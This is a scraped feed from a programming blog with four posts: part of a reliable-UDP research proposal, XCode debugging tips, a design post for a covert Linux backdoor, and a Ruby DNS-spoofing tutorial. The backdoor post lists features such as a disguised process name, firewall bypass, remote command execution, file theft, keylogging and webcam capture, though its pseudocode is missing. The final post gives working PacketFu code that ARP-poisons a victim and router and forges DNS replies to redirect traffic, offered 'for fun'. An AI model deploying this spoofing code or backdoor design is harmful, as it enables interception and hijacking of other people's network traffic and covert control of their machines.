Once the new protocol has been developed, it will be tested for reliability. This will entail transferring a file between the two systems on each test bed. The file will then be checked for validity via a MD5 sum.

After the reliability of the protocol has been established, it will be tested for speed. This will entail transferring a file between the two systems on each test bed using UDP, TCP, and the proposed reliable UDP. The file transfer time will be recorded for each protocol and then compared.

Finally, the protocol’s ability to take advantage of the available throughput on the communication line will be tested. First, the maximum available throughput will be measured using Iperf. Then the protocol will be used in a file transfer, with the packets received and transfer time used to calculate the attained throughput.

Data Analysis

For each of the sub-problems discussed at the beginning of this proposal, specific data needs to be collected and interpreted. The required data and how it is to be interpreted will now be discussed.

The first sup-problem is making the UDP protocol reliable. The data to prove that the protocol is reliable will be obtained from an observational study where the protocol is used to transfer data between two machines over a local area network and an intercontinental link. The collected data will consist of a file that has been transferred using the protocol and a tally of the number of retransmitted packets. The tally of retransmitted packets will be used to determine if the protocol can still ultimately deliver a complete file. If there are dropped packets, and therefore hopefully retransmissions, the next part of the data is interpreted. The file portion of data will be interpreted by running a MD5 Checksum on the file. If the result of this checksum matches the result of the checksum on the original file even with dropped packets, then the protocol has reliably transmitted a file.

The second sub-problem is maintaining the overall speed of the underlying UDP protocol while implementing reliability. The data required for interpretation is the elapsed time of the file transfer from start to finish using the new protocol, along with the same statistic for ordinary TCP and UDP. With these values in hand, a comparison can be made between the three values. A successful time for the new protocol will appear between the UDP and TCP values, but leaning towards the UDP time. This is to be expected since the addition of reliability to the UDP protocol will increase its transmission time.

The third sub-problem is creating a protocol that will actively take advantage of the available throughput on the communication line. The data to be collected here consists of the maximum throughput of the line and then the achieved throughput of the new protocol. The available throughput will be measured using the tool Iperf. The throughput of the new protocol will be measured during the file transfer by taking the transfer time and successfully delivered packet value. A successful result here should be close to the available throughput calculated by the Iperf tool.

These tests will be run on both the test beds to determine if the protocol is useful for the general internet. Should the protocol fail to perform adequately on one test bed but perform well on another, then further research should be done to determine the cause of this. If the protocol performs well on both the test beds and successfully passes all tests then it can be deemed ready for the general internet.

Qualifications

The qualifications of the researcher include a Diploma in Computer Systems Technology, specializing in Data Communication and a Bachelor of Technology, specializing in Network Security Administration.

Study Outline

The study outline details the four overall steps required in designing and then testing the proposed protocol according to the requirements presented in this proposal. An outline of the proposed study with the steps that are required to complete follows.

  1. Protocol needs to be designed according to the requirements outlined in this proposal.
  2. After the design work has been completed, the protocol can be coded according to the specifications.
  3. Once the protocol has been created, it needs to be tested against the requirements outlined in the first step. This is to ensure that it meets the requirements and specifications.
  4. The data collected from the tests in step three can be analyzed to determine the viability of implementing this protocol in the general internet.

References

 

Wu, Q., & Rao, N. (2005). A class of reliable UDP-based transport protocols based on stochastic approximation. (pp. 1013-1024).

 

He, E., Leigh, J., Yu, O., & DeFanti, T. (2002). Reliable blast udp : Predictable high performance bulk data transfer.

 

Tran, D. T., & Choi, E. (2007). A reliable udp for ubiquitous communication environments.

 

Long, W., & Zhenkai, (2010). Performance analysis of reliable dynamic buffer udp over wireless networks. (pp. 114-117).

 

Gu, Y., Hong, X., Mazzucco, M., & Grossman, R. (2002). Sabul: A high performance data transfer protocol.

 

]]>
http://crushbeercrushcode.org/2012/12/reliable-udp-research-proposal/feed/ 0
Four Tips for Debugging in XCode Like a Bro. http://crushbeercrushcode.org/2012/11/four-tips-for-debugging-in-xcode-like-a-bro/ http://crushbeercrushcode.org/2012/11/four-tips-for-debugging-in-xcode-like-a-bro/#comments Tue, 13 Nov 2012 19:06:25 +0000 Duncan Donaldson http://brogramming.org/brogramming/?p=247 Now every self-respecting brogrammer out there should have at least experimented with developing iOS apps, and Apple has put a lot of time into making their development environment extremely friendly and usable (although sometimes less than stable). With that said though there have still been countless times when I’ve been sitting, sipping on my venti strawberry-smoothie with double whey protein from Starbucks, while working on my latest iPhone app and been beating my head against the wall thinking to myself: “Bro! How do I debug this stupid crash?!” So this article will contain a collection of the most useful debugging features I’ve found in XCode.

 

1. Enable NSZombie Objects

Enabling zombie objects is probably one of the most useful debugging features I’ve used in the entire XCode environment. These little guys make tracking over-released objects much MUCH easier, by giving a concise error printout that states the class and memory location of the object that was over-released.

To enable zombie objects, open your scheme editor either by opening the “Product” menu and selecting “Edit Scheme” (or by using the hotkey  ⌘< ) next, select the diagnostics tab of the scheme editor and check “Enable Zombie Objects”  that’s really all there is to it.

Now I’ve disabled automated reference counting (ARC) in my examples to make over-releases, exceptions and crashes easier to reproduce, but even with ARC enabled, over-released objects and memory related crashes can still occur. Now imagine some careless developer has gone and done something like this.

1
2
3
4
5
UIView* view = [[[UIView alloc] init] autorelease];
//...
//do something with view...clearly forgetting that it has been autoreleased.
//
[view release];

If you were to run this code your view object would be over-released and your app would crash in the main function and you would see something like this.

Enable zombie objects and all of a sudden your debugger is looking something like this.

This may not seem like much in such a small example but in any decently sized project those few lines of debug output can be a goldmine of information.

 

2. Add a Global Breakpoint to All Exceptions

One thing XCode loves to do when your application crashes or throws an exception, is take you all the way to the main function, as you can see in the previous example. Wouldn’t it be nice if there was a way for the debugger to break on the line where the exception was thrown? Well we’re in luck, because there is a way. XCode has a nifty feature called exception breakpoints, that lets you put a breakpoint down that will only be hit in the case of an exception being thrown. You can either tailor these breakpoints to specific exceptions or just have the breakpoint catch all exceptions.

To enable one of these breakpoints go to your breakpoint explorer and hit the “add breakpoint” button on the bottom left. Then select “Add Exception Breakpoint” and make sure it is set to catch all exceptions.

Now instead of breaking on your main function the debugger will break at the line the exception was thrown.

This will give you a good starting point for debugging thrown exceptions and reduce the time you spend sifting through files of code trying to trace an exception back to where it was thrown.

 

3. Static Analyzer

The XCode static analyzer is a great tool for finding problems that wouldn’t show up as compiler warnings or errors like potential memory leaks and dead stores (unused values assigned to variables). This can be a great asset in improving memory usage, and performance, as well as overall stability and code quality in your application. To run a static analysis, open the product menu in XCode and select the “Analyze” option, or use the ⌘ shift B hotkey.

As you can see in the screenshot below a static analysis will catch any potential problems in your application and display them as blue warnings.

You  can also set up your project to automatically run the static analyzer whenever you compile your application by opening your project file and setting the “Run Static Analyer” option to YES, as shown below.

 

4. Conditional Breakpoints

The last tip I have for you today is on conditional breakpoints. These are just regular old breakpoints that will only break when a certain condition on a variable is met. These little guys are great if you want to catch a certain value say on a variable in a loop without having to break on every iteration, or while hunting down fringe case issues that don’t always occur. To set a conditional breakpoint, just set a regular breakpoint then right click on it select “Edit Breakpoint”. This will open up the breakpoint editor where you can set your break condition (as well as a couple other breakpoint settings), then just click the “Done” button. It really is that easy!

 

To Summarize…

With these tips, whether you’re a seasoned iOS developer, or a fresh bro just wading into the iPhone app space, you should be able to quickly and efficiently debug most (read: at least half) of the big problems you’ll come across while developing iOS apps.

Got questions or comments? Leave them below, and maybe I’ll respond, or maybe I’ll completely ignore them, it’ll be one or the other.

]]>
http://crushbeercrushcode.org/2012/11/four-tips-for-debugging-in-xcode-like-a-bro/feed/ 0
Designing a Backdoor http://crushbeercrushcode.org/2012/11/designing-a-backdoor/ http://crushbeercrushcode.org/2012/11/designing-a-backdoor/#comments Mon, 05 Nov 2012 00:36:24 +0000 Luke Queenan http://brogramming.org/brogramming/?p=215 As any good brogrammer knows, designing before you code is usually a good idea. So today I’ll be taking you through the design work for a covert application I will be creating in the coming months. There are two parts to this application, a server and client component. The server will be the actual backdoor running on the compromised machine and the client will be the program we use to communicate with it. The backdoor, or server, will be designed to run on Linux, written in C, and will be tested on Fedora 17. The client will also be written in C and should run on any Nix based system.

Requirements

Let’s start with the requirements we would like the backdoor to have.

  • Disguised process name, obviously seeing “backdoor.out” running in top is going to give us away
  • Accept packets from behind the firewall (nothing should get in the way of a brogrammer’s backdoor)
  • Only accept packets that have our embedded passphrase contained within the header
  • Execute commands passed in the encrypted packet using the system() command
  • Return the results of the executed commands to the client application
  • Searching for a file, retrieving its contents, and returning them to the client
  • Opening a covert channel back to the client for transmitting data

Some additional features that would be good to have if time permits.

  • Key logging with offline and real time functionality
  • Web camera control for taking pictures or video and uploading media back to the client

The requirements for the client application are fairly straight forward

  • Encrypt passphrase into the header along with a command or filename
  • Listen for returning data
Now that the requirements of the application have been made clear, the actual design starts. For this application I’ll be doing state diagrams to define the behavior of the programs and pseudo code to flush out the high level code design.

State Diagrams

State diagrams are really useful for visualizing the application’s flow and function design. The backdoor application is presented first.

 

Next up is the client state diagram. As the diagram shows, the client is designed as a single command per execution.

Pseudo Code

The pseudo code shown here is fairly high level, no real functions are mentioned and read and write loops are not shown. The pseudo code for back door is up first.

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69

Next up is the client pseudo code.

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37

That concludes the design work I’ve done for the backdoor. All that’s left to do is some brogramming.
 

]]>
http://crushbeercrushcode.org/2012/11/designing-a-backdoor/feed/ 0
Ruby DNS Spoofing using Packetfu http://crushbeercrushcode.org/2012/10/ruby-dns-spoofing-using-packetfu/ http://crushbeercrushcode.org/2012/10/ruby-dns-spoofing-using-packetfu/#comments Mon, 29 Oct 2012 18:00:10 +0000 Luke Queenan http://brogramming.org/brogramming/?p=142 If you’ve ever wanted to know how to redirect people to random websites for fun, today is your lucky day. I’ll give a general overview of the program’s purpose, explain some of the key sections, and provide a link to the complete code on my Github account.

The goal here is to create a proof of concept DNS Spoofer using the Ruby programming language for use on a Nix based system. The Packetfu gem is essential here for creating the raw packets. The program contains two parts, an ARP Spoofer and a DNS Spoofer. In order for the DNS queries made by the target machine to be directed to our machine, the target’s machine needs to believe that the DNS queries can be fulfilled at our IP. This is done by telling the target’s machine that we are the router, and telling the router that we are the target’s machine. Thus we create a man in the middle where we intercept all DNS request traffic and respond with our own crafted DNS response packets. We can now direct all web traffic to a given IP address.

Since this is a proof of concept application, it is not heavily optimized for efficiency. However, it still achieves it’s purpose and has been designed to be as robust as possible given the constraints of the Ruby language. Due to the nature of the two tasks required for DNS Spoofing, the program was designed to run as two separate processes. The ARP spoofing is carried out in a child process, while the packet capturing and sending out of DNS responses is carried out in the parent process. This ensures the best performance possible.

Let’s start with the code for creating the ARP packets we’ll be sending to the target and router.

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
# Make the victim packet
@arp_packet_victim = PacketFu::ARPPacket.new()
@arp_packet_victim.eth_saddr = ourInfo[:eth_saddr]       # our MAC address
@arp_packet_victim.eth_daddr = victimMAC                 # the victim's MAC address
@arp_packet_victim.arp_saddr_mac = ourInfo[:eth_saddr]   # our MAC address
@arp_packet_victim.arp_daddr_mac = victimMAC             # the victim's MAC address
@arp_packet_victim.arp_saddr_ip = routerIP               # the router's IP
@arp_packet_victim.arp_daddr_ip = victimIP               # the victim's IP
@arp_packet_victim.arp_opcode = 2                        # arp code 2 == ARP reply
 
# Make the router packet
@arp_packet_router = PacketFu::ARPPacket.new()
@arp_packet_router.eth_saddr = ourInfo[:eth_saddr]       # our MAC address
@arp_packet_router.eth_daddr = routerMAC                 # the router's MAC address
@arp_packet_router.arp_saddr_mac = ourInfo[:eth_saddr]   # our MAC address
@arp_packet_router.arp_daddr_mac = routerMAC             # the router's MAC address
@arp_packet_router.arp_saddr_ip = victimIP               # the victim's IP
@arp_packet_router.arp_daddr_ip = routerIP               # the router's IP
@arp_packet_router.arp_opcode = 2                        # arp code 2 == ARP reply

These packets are then sent out in 2 second intervals in a forever loop. The pause between sending out the ARP packets needs to be small enough that the router is unable to reestablish a connection with the target’s machine.

1
2
3
4
5
6
# Run until we get killed by the parent, sending out packets
while true
    sleep 2
    @arp_packet_victim.to_w(@interface)
    @arp_packet_router.to_w(@interface)
end

Now with the ARP spoofing running, we can start intercepting DNS Query packets from the target’s machine. The code to do this is fairly straight forward and is explained by the inline comments. Basically, the filter is set up to only capture those packets matching a DNS packet from the target’s machine. Once we receive a packet, we ensure that it’s a query, grab the domain name requested (for the response packet) and call the response function.

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
# Start the capture process
filter = "udp and port 53 and src " + @victimIP
capture = Capture.new(:iface =&gt; @interface, :start =&gt; true,
                                :promisc =&gt; true,
                                :filter =&gt; filter,
                                :save =&gt; true)
 
# Find the DNS packets
capture.stream.each do |pkt|
    # Make sure we can parse the packet; if we can, parse it
    if UDPPacket.can_parse?(pkt)
        packet = Packet.parse(pkt)
 
        # Make sure we have a query packet
        dnsQuery = packet.payload[2].to_s + packet.payload[3].to_s
        if dnsQuery == '10'
 
            # Get the domain name into a readable format
            domainName = getDomainName(packet.payload[12..-1])
 
            if domainName == nil
                next
            end
 
            puts "DNS request for: " + domainName
 
            sendResponse(packet, domainName)
        end
    end
end

The response function is the most technical portion of the program. Here we actually have to construct a DNS Response packet from scratch. I did this by capturing a sample session in Wireshark and then filling in the appropriate fields. I begin by taking the IP we are going to redirect the user to and converting it into hex using the to_i and pack functions provided by Packetfu. In this case we are using one of Facebook’s IPs but this could be something far more interesting. From there we create a new UDP packet using the data contained in @ourInfo (IP and MAC) and fill in the normal UDP fields. I take most of this information straight from the DNS Query packet. The next step is to create the DNS Response. The best way to understand the code here is to look at a DNS header and then take the bit map of the HEX values and apply them to the header. This will let you see what flags are being set. From here, we just calculate the checksum for the UDP packet and send it out to the target’s machine.

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
def sendResponse(packet, domainName)
 
    # Convert the IP address
    facebookIP = "69.171.234.21"
    myIP = facebookIP.split(".");
    myIP2 = [myIP[0].to_i, myIP[1].to_i, myIP[2].to_i, myIP[3].to_i].pack('c*')
 
    # Create the UDP packet
    response = UDPPacket.new(:config =&gt; @ourInfo)
    response.udp_src = packet.udp_dst
    response.udp_dst = packet.udp_src
    response.ip_saddr = packet.ip_daddr
    response.ip_daddr = @victimIP
    response.eth_daddr = @victimMAC
 
    # Transaction ID
    response.payload = packet.payload[0,2]
 
    response.payload += "\x81\x80" + "\x00\x01\x00\x01" + "\x00\x00\x00\x00"
 
    # Domain name
    domainName.split(".").each do |section|
        response.payload += section.length.chr
        response.payload += section
    end
 
    # Set more default values...........
    response.payload += "\x00\x00\x01\x00" + "\x01\xc0\x0c\x00"
    response.payload += "\x01\x00\x01\x00" + "\x00\x00\xc0\x00" + "\x04"
 
    # IP
    response.payload += myIP2
 
    # Calculate the packet
    response.recalc
 
    # Send the packet out
    response.to_w(@interface)
 
end

Now that the coding is out of the way, let’s take a look at some packet captures from our machine. First up is the DNS Query packet received from the target’s machine. Note the URL request for bcit.ca.

After receiving this request, our machine sends out the faked DNS response. Note the Facebook IP in the response packet. This is what will send the target’s browser to Facebook.

So there you have it, a Ruby DNS Spoofer! If you would like to look at the complete code, it can be found in the following repo on my Github account. If you have questions, leave a comment.

]]>
http://crushbeercrushcode.org/2012/10/ruby-dns-spoofing-using-packetfu/feed/ 1